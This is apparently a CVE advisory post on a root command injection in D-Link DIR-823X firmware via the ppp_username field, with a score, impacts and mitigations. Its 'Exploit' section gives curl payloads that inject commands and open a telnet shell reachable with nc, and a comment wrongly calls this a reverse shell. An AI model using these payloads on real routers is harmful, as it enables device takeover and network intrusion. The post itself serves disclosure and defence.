D-Link DIR-823X, Command Injection, CVE-2025-14208 (Medium)

Listen to this Post

The vulnerability CVE-2025-14208 is a command injection flaw found in the D-Link DIR-823X router firmware versions up to 20250416. It exists within the function sub_415028, which is part of the binary handling requests to the `/goform/set_wan_settings` endpoint. This endpoint is responsible for configuring WAN connection settings, specifically Point-to-Point Protocol (PPP) settings. The issue arises because the `ppp_username` parameter, supplied via a POST request to this endpoint, is not properly sanitized or validated before being used in a system command. An attacker can inject arbitrary operating system commands by appending shell metacharacters (like ;, &&, or |) to the username value. Because the application runs with high privileges, the injected commands are executed with the same root-level access, allowing a remote, authenticated attacker to completely compromise the router. The exploit for this vulnerability has been publicly released, increasing the risk of widespread exploitation .

dailycve form:

Platform: D-Link DIR-823X
Version: up to 20250416
Vulnerability: Command Injection
Severity: Medium
date: Dec 8 2025

Prediction: Patch unlikely (EoL)

What Undercode Say:

Analytics:

  • CVSS Score: 6.3 (Medium) – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
  • Attack Vector: Network
  • Complexity: Low
  • Privileges Required: Low
  • Exploit Availability: Public
  • EPSS Probability: 0.72% (as of Dec 14, 2025)

Exploit:

Example using curl to inject a command (e.g., write to file)
Replace TARGET_IP with the router's IP address
curl -X POST http://TARGET_IP/goform/set_wan_settings \
-d "ppp_username=admin; touch /tmp/pwned &" \
-d "ppp_password=password" \
-d "wan_type=pppoe"
Example to start a reverse shell (attacker IP 192.168.1.100, port 4444)
curl -X POST http://TARGET_IP/goform/set_wan_settings \
-d "ppp_username=admin; telnetd -l /bin/sh -p 9999 &" \
-d "ppp_password=password" \
-d "wan_type=pppoe"
Then connect from attacker machine: nc TARGET_IP 9999

Protection from this CVE:

1. Isolate Device: Place router on separate VLAN.

  1. Firewall Rules: Block WAN-side access to ports 80/443.
  2. Monitor Logs: Inspect for `/goform/set_wan_settings` with shell metacharacters .
  3. Disable Remote Management: Ensure feature is turned off.
  4. Replace Hardware: Upgrade to a supported router model .

Impact:

  • Remote Code Execution: As root user .
  • Full Device Compromise: Attacker gains complete control.
  • Network Pivot: Launch point for internal network attacks .
  • Data Theft: Intercept or redirect sensitive traffic .
  • Botnet Recruitment: Device used in DDoS attacks .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top